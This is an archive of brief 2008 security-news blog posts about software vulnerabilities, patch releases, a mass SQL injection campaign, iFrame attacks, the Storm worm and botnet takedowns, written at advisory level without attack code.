Wednesday, April 30, 2008

Microsoft Helps In Hacker Busting With Its Botnet-hunting Tool

Microsoft is giving law enforcers access to a special tool that keeps tabs on botnets. It's done by using data compiled from the 450 million computer users who have installed the Malicious Software Removal tool coming with Windows.

"The tool includes data and software that helps law enforcers get a better picture of the data being provided by Microsoft's users", said Tim Cranton, associate general counsel with Microsoft's World Wide Internet Safety Programs.

Botnets are networks consisting of hacked computers. This kind of network is like a super computer that is used for example to send spam and attack servers on the Internet. Botnets have been on Microsoft's radar for about four years - since the company identified them as a significant emerging threat.

Microsoft hasn't come to public with the tool before this but it turns out that it was used in Canadian police's bust made in February. The Sûreté du Québec used botnet-buster to break up a network that had infected nearly 500,000 computers in 110 countries according to Captain Frederick Gaudreau, who heads up the provincial police force's cybercrime unit.

Source

Tuesday, April 29, 2008

WordPress 2.5.1 Fixes 2 Vulnerabilities And A Bunch of Bugs

There's been released a new version of WordPress which contains bug fixes and also fixes for a couple of found vulnerabilities.

First one of these makes it possible to bypass administrator access control by using appropriate cookie. The vulnerability provides also a possibility to execute PHP code as the web server user. Vulnerability can be used only if a WordPress blog is configured to freely permit account creation.

Second one of the found vulnerabilities is cross site scripting (XSS) type vulnerability. Incomplete input checking provides a possibility to execute script code in user's browser.


Vulnerable versions for above meantioned vulnerabilities:
- WordPress 2.5 and possible older versions

Solution:
- Update version to 2.5.1

More information can be read here.

Thursday, April 24, 2008

Mass SQL Injection Going On - Over 500,000 web sites infected already

F-Secure reports in its blog that there's ongoing a new wave of attacks in which criminals code has been inserted to web sites. Problem is massive since there are currently over half a million infected websites.

In most web sites it's possible for a site visitor to input text for example thru blog comments, forum discussion boards etc. If this data from the users isn't checked - quite often these checks are missing - the attacker can add in some own attack code. This is what "sql injection" attack is all about.

In this currently ongoing SQL injection attack used code changes some part of web site contained text to links pointing to criminals own sites. "There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan," tells F-Secure. So far the domains used for hosting the malicious content are nmidahena.com, aspder.com and nihaorr1.com. At the moment initial page on all those domains are unaccessible. This could change though.

It's recommended web administrators to check that their sites don't contain this attack code. Now (if not done already) it's also good time to build up some protection to check the data inserted by the users and this way make malicious code insertion impossible.

Monday, April 21, 2008

Unpatched Vulnerability In Windows Operating System

There has been found a new vulnerability in Windows operating system. It could be exploited by authenticated attackers to gain elevated privileges. This issue is caused by an error when running applications in the context of the NetworkService or LocalService accounts, which could be exploited to gain access to resources in processes that are also running as NetworkService or LocalService, and that have the ability to elevate their privileges to LocalSystem, allowing any NetworkService or LocalService processes to elevate their privileges to LocalSystem.

Microsoft is investigating the vulnerability and will release a fix if it's seen as necessary. As a workaround Microsoft recommends to configure or specify a Worker Process Identity (WPI) for an application pool.

For More information please see Microsoft Security Advisory of the vulnerability.

Vulnerable operating systems:
* Windows XP
* Windows Server 2003
* Windows Vista
* Windows Server 2008

Friday, April 18, 2008

Vulnerabilities in Open Office software

Multiple vulnerabilities have been identified in Open Office software, which could be exploited by attackers to cause a denial of service or compromise an affected system. These issues are caused by heap overflow and corruption errors when processing specially crafted ODF text documents with XForms, or when handling malformed Quattro Pro, EMF or OLE files, which could be exploited by attackers to crash an affected application or execute arbitrary code by tricking a user into opening a specially crafted document.

Vulnerable versions are all versions beyond 2.4 version so users are instructed to update their versions to the latest one.

Release Notes of Open Office 2.4 version can be read here

Thursday, April 17, 2008

Firefox 2.0.0.14 update available

Mozilla has released security and stability updates containing 2.0.0.14 version of Firefox Internet browser.

New users can download latest version of the Firefox browser here.

If you already have Firefox 2.x installed you will receive an automated update notification within 24 to 48 hours. To apply the update manually please select "Check for Updates..." from the Help menu.

Release Notes of the update can be read here.

Wednesday, April 16, 2008

Sun released Java Runtime Environment (JRE) 6 Update 6

Sun has released updated version of the Java SE Runtime Environment (JRE) 6. Java SE Runtime Environment allows end-users to run Java applications.

New version can be downloaded from Sun's Java SE Downloads site (by clicking download button on the right side of "Java Runtime Environment (JRE) 6 Update 6" and following given instructions). Before installing new version it's advisable to remove old versions first.

Release Notes of the update can be read here.

Monday, April 14, 2008

Oracle Warns of Critical DB Server Vulnerabilities

Database server giant Oracle plans to ship a major security update on Tuesday, April 15 to cover more than 40 vulnerabilities in a wide range of products.

The fixes are part of the company's quarterly CPU (critical patch update) and will cover severe vulnerabilities across hundreds of Oracle products.

According to Oracle's CPU Pre-Release Announcement this Critical Patch Update contains 17 new security fixes for the Oracle Database including 2 for Oracle Application Express. Two of these vulnerabilities may be remotely exploited without authentication (i.e. may be exploited over a network without the need for a username and password).

CPU contains 3 new fixes for Oracle Application Server too. Each of those vulnerabilities may be remotely exploited without authentication.

    Other security fixes included in April CPU:
  • 11 new security fixes for the Oracle E-Business Suite, seven of these vulnerabilities may be remotely exploited without authentication

  • One new security fix for the Oracle Enterprise Manager, this vulnerability may not be remotely exploited without authentication

  • Three new security fixes for Oracle PeopleSoft Enterprise products, none of these vulnerabilities may be remotely exploited without authentication

  • Six new security fixes for Oracle Siebel SimBuilder products, three of these vulnerabilities may be remotely exploited without authentication



    Products affected by security vulnerabilities addressed by April CPU:
  • Oracle Database 11g, version 11.1.0.6

  • Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3

  • Oracle Database 10g, version 10.1.0.5

  • Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV

  • Oracle Application Server 10g Release 3 (10.1.3), versions 10.1.3.1.0, 10.1.3.3.0

  • Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.0.2, 10.1.2.1.0, 10.1.2.2.0

  • Oracle Application Server 10g (9.0.4), version 9.0.4.3

  • Oracle Collaboration Suite 10g, version 10.1.2

  • Oracle E-Business Suite Release 12, versions 12.0.0 - 12.0.4

  • Oracle E-Business Suite Release 11i, versions 11.5.9 - 11.5.10 CU2

  • Oracle PeopleSoft Enterprise PeopleTools versions 8.22.19, 8.48.16, 8.49.09

  • Oracle PeopleSoft Enterprise HCM versions 8.8 SP1, 8.9, 9.0

  • Oracle Siebel SimBuilder versions 7.8.2, 7.8.5

Saturday, April 12, 2008

Security Pros Launch OCERT

A group of computer security professionals has launched oCERT (Open Source Computer Emergency Response Team), an effort to be the go-to place for security incident response for open-source projects. Supporters behind it are Google, security consulting firm Inverse Path and the Open Source Lab at Oregon State University.

OCERT wants to offer tools for helping small and also big open-source software companies take care of the security of their software.

"Small open-source projects often don't have any form of security handling but the same code they manage [is] included by bigger projects and distributions. When there's a compromise, there's no proper coordination and that's not acceptable," says Andrea Barisani, oCERT founder and project coordinator to eWeek.

Thursday, April 10, 2008

Vulnerabilities found in Adobe Flash Player

Critical vulnerabilities have been identified in Adobe Flash Player that could allow an attacker who successfully exploits these potential vulnerabilities to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities.

Vulnerable programs are:

- Adobe Flash Player 9.0.115.0 and earlier versions
- Adobe Flash Player 8.0.39.0 and earlier versions
- Flex 3.0
- AIR 1.0

Solution is to upgrade Adobe Flash Player to the newest version 9.0.124.0, by downloading it from the Player Download Center, or by using the auto-update mechanism within the product when prompted. Flex users can get the update here and AIR users through AIR Download Centre.


More information can be found here.

Tuesday, April 8, 2008

Microsoft released updates for Windows and Office vulnerabilities

Microsoft has released its monthly security update packet today. There're eight updates in total of which five are categorized as critical.

More information of the updates can be found here.

Finnish Tietokone.fi portal under iFrame attack

Web portal of Finnish computer magazine Tietokone was closed down for ten hours last Friday (the 4th of April) afternoon when it was found out that site was spreading malicious script. Used attacking method was so called iFrame injection attack which was possible because server's security updates weren't up-to-date. Only Internet Explorer (IE) browser users were affected since malware utilized ActiveX technique supported only by IE.

The attack is part of large scale attack which security consultant Dancho Danchev writes about in his blog. Currently nmidahena.com server spreads its script on over 3000 web sites so Tietokone.fi wasn't any special target. During recent weeks similar attack has been used against large sites like Usatoday, News.com and Miami Herald among many others.

Monday, April 7, 2008

Storm Blogs At Blogspot.com

Storm worm is once again targetting blogging community. This time especially Blogspot.com. Several blogger sites with random or odd names have been created. These sites appear to have been created solely for Storm's purposes and no legitimate blogger site has of yet been reported as infected.

Visiting these sites will lead surfer to another page, while keeping the Blogger menu at the top.

Clicking the site's image will download a file named as love.exe while clicking the link will download withlove.exe file.


Source

Computer Viruses Expected To Hit 1 Million By The End of Year

Security experts say that the total number of viruses will reach one million by year's end.

That's because malware writers have been forced to create new types of viruses and exploits more regularly as businesses and individuals improve security practices, the experts said.

According to F-Secure Asia Pacific vice president Jari Heinonen malware will increasing target the kernel sector through rootkits such as Mebroot, which attacks the bootstrap sector.

Source